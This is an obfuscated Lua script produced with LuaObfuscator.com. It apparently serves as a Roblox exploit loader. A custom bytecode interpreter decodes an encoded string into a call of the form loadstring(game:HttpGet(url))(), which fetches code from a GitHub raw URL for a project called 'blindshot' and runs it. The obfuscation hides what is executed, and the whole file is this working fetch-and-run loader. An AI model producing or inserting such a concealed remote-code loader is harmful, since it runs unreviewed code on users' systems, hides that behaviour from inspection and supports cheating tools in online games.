--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v123=0;local v124;while true do if (v123==1) then return v124;end if (v123==0) then v124=v5(v86,v19);v19=nil;v123=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-((883 -263) -(555 + 64)))) + (932 -(857 + 74)))) ;return v87-(v87%((2206 -(1523 + 114)) -(367 + 201))) ;else local v88=(929 -(214 + 713))^(v32-((1066 -(68 + 997)) + (1270 -(226 + 1044)))) ;return (((v31%(v88 + v88))>=v88) and ((4 -3) + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (40022563 -(92388336 -69142989))) + (v40 * (121138 -55602)) + (v39 * ((345 + 124) -213)) + v38 ;end if (v37==((1302 -(802 + 150)) -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -(1 -0) ;local v45=(v20(v43,(439 -(145 + 293)) -(430 -(44 + 386)) ,20) * (((1488 -(998 + 488)) + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,7 + 14 ,87 -56 );local v47=((v20(v43,19 + 11 + 2 )==1) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else local v110=0;while true do if (v110==(0 -0)) then v46=1 + 0 ;v44=791 -(368 + 423) ;break;end end end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/(2^(23 + 29)))) ;end local function v25(v48) local v49=772 -(201 + 571) ;local v50;local v51;while true do if (v49==(1141 -(116 + 1022))) then return v6(v51);end if (v49==(4 -3)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -5 ;end if (v49==2) then v51={};for v111=3 -2 , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=862 -(814 + (930 -(261 + 624))) ;end if (v49==(0 -0)) then v50=nil;if  not v48 then local v117=0 -0 ;while true do if (v117==0) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 651 -(494 + 157) ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89==(0 -0)) then local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if (v118~=(0 + 0)) then else v119=(function() return 0 + 0 ;end)();while true do if (v119==(1 + 0)) then v89=(function() return  #"!";end)();break;end if (v119==(836 -(660 + 176))) then v90=(function() return v91();end)();v92=(function() return nil;end)();v119=(function() return 1;end)();end end break;end end end if (v89~= #">") then else if (v90== #"|") then v92=(function() return v91()~=0 ;end)();elseif (v90==2) then v92=(function() return v93();end)();elseif (v90~= #"asd") then else v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99) local v100=(function() return 0;end)();local v101=(function() return;end)();while true do if (0==v100) then v101=(function() return 0 + 0 ;end)();while true do if (v101~=0) then else local v125=(function() return 0;end)();while true do if (0~=v125) then else v97[v98-#"[" ]=(function() return v99();end)();return v97,v98,v99;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"<",v58 do FlatIdent_C460,Type,v21,Cons,v24,v25,v59,v67=(function() return v52(FlatIdent_C460,Type,v21,Cons,v24,v25,v59,v67);end)();end v57[ #"xnx"]=(function() return v21();end)();for v68= #"}",v23() do local v69=(function() return v21();end)();if (v20(v69, #"}", #"{")~=(675 -(534 + 141))) then else local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if ((0 + 0)==v105) then local v121=(function() return 0 + 0 ;end)();local v122=(function() return;end)();while true do if (v121==0) then v122=(function() return 0 -0 ;end)();while true do if (1~=v122) then else v105=(function() return 1 -0 ;end)();break;end if (0==v122) then v106=(function() return 0;end)();v107=(function() return nil;end)();v122=(function() return 1;end)();end end break;end end end if (v105==2) then while true do if ( #"}"~=v106) then else local v131=(function() return 0 -0 ;end)();local v132=(function() return;end)();while true do if (v131==0) then v132=(function() return 0 + 0 ;end)();while true do if (v132~=1) then else v106=(function() return 2 + 0 ;end)();break;end if (v132~=(396 -(115 + 281))) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 -0)) then local v174=(function() return 0 + 0 ;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 0 -0 ;end)();while true do if (v175==0) then v109[ #"19("]=(function() return v22();end)();v109[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v107== #">") then v109[ #"nil"]=(function() return v23();end)();elseif (v107==2) then v109[ #"19("]=(function() return v23() -((7 -5)^(883 -(550 + 317))) ;end)();elseif (v107~= #"xxx") then else local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if (v182~=(0 -0)) then else v183=(function() return 0 -0 ;end)();while true do if (v183==(285 -(134 + 151))) then v109[ #"gha"]=(function() return v23() -((1667 -(970 + 695))^16) ;end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end end v132=(function() return 1;end)();end end break;end end end if (v106==(0 -0)) then local v133=(function() return 1990 -(582 + 1408) ;end)();while true do if (v133==(3 -2)) then v106=(function() return  #" ";end)();break;end if (v133~=0) then else v107=(function() return v20(v69,2 -0 , #"-19");end)();v108=(function() return v20(v69, #".com",6);end)();v133=(function() return 3 -2 ;end)();end end end if ( #"-19"==v106) then if (v20(v108, #"xxx", #"91(")== #"|") then v109[ #"asd1"]=(function() return v59[v109[ #"xnxx"]];end)();end v54[v68]=(function() return v109;end)();break;end if (v106~=2) then else local v135=(function() return 1824 -(1195 + 629) ;end)();while true do if (v135~=(0 -0)) then else if (v20(v108, #" ", #"]")== #"}") then v109[243 -(187 + 54) ]=(function() return v59[v109[782 -(162 + 618) ]];end)();end if (v20(v108,2 + 0 ,2 + 0 )== #"/") then v109[ #"91("]=(function() return v59[v109[ #"xnx"]];end)();end v135=(function() return 1 -0 ;end)();end if (v135~=1) then else v106=(function() return  #"-19";end)();break;end end end end break;end if (v105==(1 -0)) then v108=(function() return nil;end)();v109=(function() return nil;end)();v105=(function() return 2;end)();end end end end for v70= #" ",v23() do v55,v70,v28=(function() return v53(v55,v70,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[1638 -(1373 + 263) ];local v66=v61[1003 -(451 + 549) ];return function(...) local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=1 + 0 ;local v76= -(1 -0);local v77={};local v78={...};local v79=v12("#",...) -(1385 -((1330 -(57 + 527)) + 638)) ;local v80={};local v81={};for v102=0 + 0 ,v79 do if ((4646>=2992) and (v102>=v73)) then v77[v102-v73 ]=v78[v102 + 1 ];else v81[v102]=v78[v102 + (1 -(1427 -(41 + 1386))) ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[342 -(218 + 123) ];if (v84<=(1587 -(1535 + 46))) then if (v84<=((105 -(17 + 86)) + 0)) then if (v84<=(0 + 0)) then local v126=v83[2];local v127=v81[v83[563 -(306 + 254) ]];v81[v126 + 1 + 0 ]=v127;v81[v126]=v127[v83[(5 + 2) -3 ]];elseif (v84>(1468 -(899 + 568))) then local v136=0 + 0 ;local v137;while true do if (v136==((0 -0) -0)) then v137=v83[605 -(268 + 335) ];v81[v137]=v81[v137](v13(v81,v137 + (291 -((173 -113) + 230)) ,v76));break;end end else v81[v83[574 -(426 + 146) ]]=v63[v83[1 + 2 ]];end elseif ((1434<3106) and (v84<=4)) then if ((786<3023) and (v84>3)) then v81[v83[(1624 -(122 + 44)) -(282 + 1174) ]]=v83[5 -2 ];else local v142=811 -(569 + (802 -560)) ;local v143;local v144;local v145;local v146;while true do if (v142==(2 -1)) then v76=(v145 + v143) -(1 + 0) ;v146=1024 -(575 + 131 + 318) ;v142=1253 -(721 + 530) ;end if ((v142==2) or (2442<74)) then for v172=v143,v76 do local v173=1271 -(945 + 326) ;while true do if (v173==(0 -0)) then v146=v146 + 1 + 0 ;v81[v172]=v144[v146];break;end end end break;end if (v142==(700 -(271 + 429))) then v143=v83[2 + 0 ];v144,v145=v74(v81[v143](v13(v81,v143 + 1 ,v83[1 + 2 ])));v142=1501 -(1408 + 92) ;end end end elseif (v84==(1091 -(461 + 625))) then local v147=v83[1290 -(993 + 295) ];v81[v147]=v81[v147](v13(v81,v147 + 1 ,v76));else v81[v83[2]]();end elseif (v84<=9) then if (v84<=(1 + 6)) then do return;end elseif ((4535==4535) and (v84>(1179 -((846 -428) + 753)))) then v81[v83[2]]();else local v149=v83[1 + 1 ];local v150=v81[v83[1 + 2 ]];v81[v149 + 1 + 0 ]=v150;v81[v149]=v150[v83[2 + 2 ]];end elseif ((v84<=(540 -(406 + 123))) or (3009<=2105)) then if (v84>(1779 -((1814 -(30 + 35)) + 20))) then local v154=v83[1 + 0 + 1 ];local v155,v156=v74(v81[v154](v13(v81,v154 + (1323 -((2506 -(1043 + 214)) + 73)) ,v83[2 + 1 ])));v76=(v156 + v154) -(1146 -(466 + 679)) ;local v157=0 -0 ;for v164=v154,v76 do v157=v157 + 1 ;v81[v164]=v155[v157];end else do return;end end elseif ((1830<3669) and (v84==(34 -22))) then v81[v83[1902 -(106 + 1794) ]]=v63[v83[1 + 2 ]];else v81[v83[1 + 1 ]]=v83[(30 -22) -5 ];end v75=v75 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403563Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F736F6261636867726F6936372D6370752F626C696E6473686F742F726566732F68656164732F6D61696E2F626C696E6473686F7400083Q00120C3Q00013Q00120C000100023Q00202Q000100010003001204000300044Q000B000100034Q00025Q00022Q00063Q000100012Q00073Q00017Q00",v9(),...);
